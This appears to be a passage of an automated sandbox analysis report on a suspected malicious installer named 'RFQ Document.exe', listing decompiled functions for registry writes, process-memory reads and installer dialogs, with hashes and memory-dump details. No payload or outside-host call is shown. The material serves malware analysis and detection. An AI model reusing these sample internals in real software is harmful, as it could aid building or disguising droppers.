Instruction ID: 04a9bfa111c124dc3747bb8f0eb18f2f9973b66003cab2e79f8f0ac0f5562d7c
Opcode Fuzzy Hash: 3360cc99b38f6f1617c2b222c560597c1a65ab6081c75a87a04e6e4cd3b47f7a
Instruction Fuzzy Hash: 9C317CB5E10208EFDB40DF94C945BAEB7B5EF45358F208169E8246B380D735BE44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}

0x00402337
0x0040233c
0x00402346
0x00402350
0x00402353
0x0040235d
0x0040236d
0x00402374
0x0040237c
0x0040238a
0x0040238e
0x00402399
0x00402399
0x0040239d
0x004023a1
0x004023a7
0x004023ac
0x004023ac
0x004023b0
0x004023bc
0x004023bc
0x004023d5
0x004023d7
0x004023d7
0x004023da
0x004024b0
0x004024b0
0x004028c1
0x004028cd

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0

Strings

C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp, xrefs: 00402385, 004023A7, 004023B7, 004023C2

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp
API String ID: 1356686001-1368712537
Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 004038E3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x764fc8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "iqbk Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x3
						_t27 =  *0x42ec48; // 0x765174
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x76518c
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x004038e7
0x004038ec
0x004038f2
0x004038f7
0x004038f7
0x004038ff
0x00000000
0x00000000
0x00403901
0x00403907
0x0040390f
0x00403911
0x00403917
0x00403917
0x00403919
0x00403925
0x00000000
0x00000000
0x00403929
0x00000000
0x00000000
0x00000000
0x0040392b
0x00403930
0x00403939
0x0040393f
0x00403944
0x00403958
0x00403963
0x0040397b
0x00403981
0x00403986
0x0040398e
0x004039af
0x004039af
0x004039af
0x00403990
0x00403992
0x00403992
0x00403996
0x00403999
0x0040399d
0x0040399d
0x004039a2
0x004039a8
0x004039a8
0x00000000
0x00403992
0x00403946
0x0040394b
0x00403954
0x0040394d
0x0040394d
0x0040394d
0x0040394b

APIs

SetWindowTextA.USER32(00000000,iqbk Setup), ref: 0040397B

Strings

tQv, xrefs: 00403986
1033, xrefs: 004038E7, 004038F1, 00403962
iqbk Setup, xrefs: 0040396A
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 004038E4

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $1033$iqbk Setup$tQv
API String ID: 530164218-2416238681
Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6FD82D80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6FD82D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				void* _t24;
				intOrPtr _t28;

				_v12 = E6FD81480(_a4);
				_v8 = 0;
				_t24 = _a16;
				0x6fd80000(_a8, _a12, _t24, _a20, _a24);
				0x6fd80000("%p, %s, %p, %u, %p.\n", _a4, _t24);
				_push(_v12);
				 *0x6fd88000 = E6FD81120(_a4);
				if( *0x6fd88000 != 0) {
					_t28 =  *0x6fd88000;
					_t39 =  *(_t28 + 8);
					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
						_v8 = E6FD87760(_t39, GetLastError());
						0x6fd80000("Failed to read process memory %#x.\n", _v8);
					} else {
						if(_a24 != 0) {
							 *_a24 = _v16;
						}
					}
					return _v8;
				}
				return 0x8000ffff;
			}

0x6fd82d92
0x6fd82d95
0x6fd82da4
0x6fd82db0
0x6fd82dc2
0x6fd82dcd
0x6fd82dd6
0x6fd82de2
0x6fd82dfb
0x6fd82e00
0x6fd82e0c
0x6fd82e2d
0x6fd82e39
0x6fd82e0e
0x6fd82e12
0x6fd82e1a
0x6fd82e1a
0x6fd82e1c
0x00000000
0x6fd82e41
0x00000000

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 6FD82E04

Strings

Failed to read process memory %#x., xrefs: 6FD82E34
%p, %s, %p, %u, %p., xrefs: 6FD82DBD

Memory Dump Source

Source File: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessRead
String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
API String ID: 1726664587-1385917401
Opcode ID: e0e1f48fb2828614acebacca4ba6d795ba44ca87422f0cab182cc3c28a400452
Instruction ID: 28d27cabf2bc0a7836d4329f9d79c28397bd887b51ef1b10d8c0acea56f638b3
Opcode Fuzzy Hash: e0e1f48fb2828614acebacca4ba6d795ba44ca87422f0cab182cc3c28a400452
Instruction Fuzzy Hash: 502150F5900608EFDB40CF98D845E9E77B8AB49305F148158F92987340E731FA24DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}

0x00402a79
0x00402a8a
0x00402a92
0x00402aba
0x00402aa1
0x00402aa4
0x00402af4
0x00402afa
0x00402afc
0x00000000
0x00402afc
0x00402ab1
0x00402ab6
0x00402ab8
0x00000000
0x00000000
0x00402ab8
0x00402acf
0x00402ad7
0x00402ade
0x00402b04
0x00402b0a
0x00000000
0x00000000
0x00402b12
0x00402b18
0x00402b1a
0x00000000
0x00000000
0x00000000
0x00402b1a
0x00000000
0x00402aed
0x00402b01

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
RegCloseKey.ADVAPI32(?), ref: 00402ACF
RegCloseKey.ADVAPI32(?), ref: 00402AF4
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ce8
0x00401cef
0x00401d1e
0x00401d26
0x00401d2d
0x00401d2d
0x004028c1
0x004028cd

APIs

GetDlgItem.USER32 ref: 00401CE2
GetClientRect.USER32 ref: 00401CEF
LoadImageA.USER32 ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79

Uniqueness

Uniqueness Score: -1.00%

Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}

0x0040467e
0x00404683
0x0040468b
0x0040468c
0x00404699
0x004046a1
0x004046a2
0x004046a4
0x004046a6
0x004046a8
0x004046ab
0x004046ab
0x004046b2
0x004046b8
0x004046b8
0x004046bf
0x004046c6
0x004046c9
0x004046cc
0x004046cc
0x004046d0
0x004046e0
0x004046e2
0x004046e5
0x0040468e
0x0040468e
0x00404695
0x00404695
0x004046ed
0x004046f8
0x0040470e
0x0040471e
0x0040473a

APIs

lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
wsprintfA.USER32 ref: 0040471E
SetDlgItemTextA.USER32 ref: 00404731

Strings

%u.%u%s%s, xrefs: 00404700

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bd3
0x00401bdf
0x00401be2
0x00401beb
0x00401beb
0x00401bee
0x00401bf2
0x00401bfb
0x00401bfb
0x00401bfe
0x00401c02
0x00401c04
0x00401c51
0x00401c53
0x00401c5c
0x00401c64
0x00401c67
0x00401c67
0x00401c70
0x00000000
0x00401c06
0x00401c0d
0x00401c0f
0x00401c17
0x00401c1a
0x00401c42
0x00401c76
0x00401c76
0x00401c1c
0x00401c2a
0x00401c32
0x00401c35
0x00401c35
0x00401c1a
0x00401c79
0x00401c7c
0x00401c82
0x00402866
0x00402866
0x004028c1
0x004028cd

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29

Uniqueness

Uniqueness Score: -1.00%

Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004056bb
0x004056d2
0x004056da
0x004056da
0x004056e2

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
lstrcatA.KERNEL32(?,00409010), ref: 004056DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d46
0x00401d5f
0x00401d69
0x00401d6e
0x00401d79
0x00401d80
0x00401d92
0x00401d98
0x00401d9d
0x00401da7
0x004024eb
0x00401561
0x00402866
0x004028c1
0x004028cd

APIs

GetDC.USER32(?), ref: 00401D3F
GetDeviceCaps.GDI32(00000000), ref: 00401D46
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
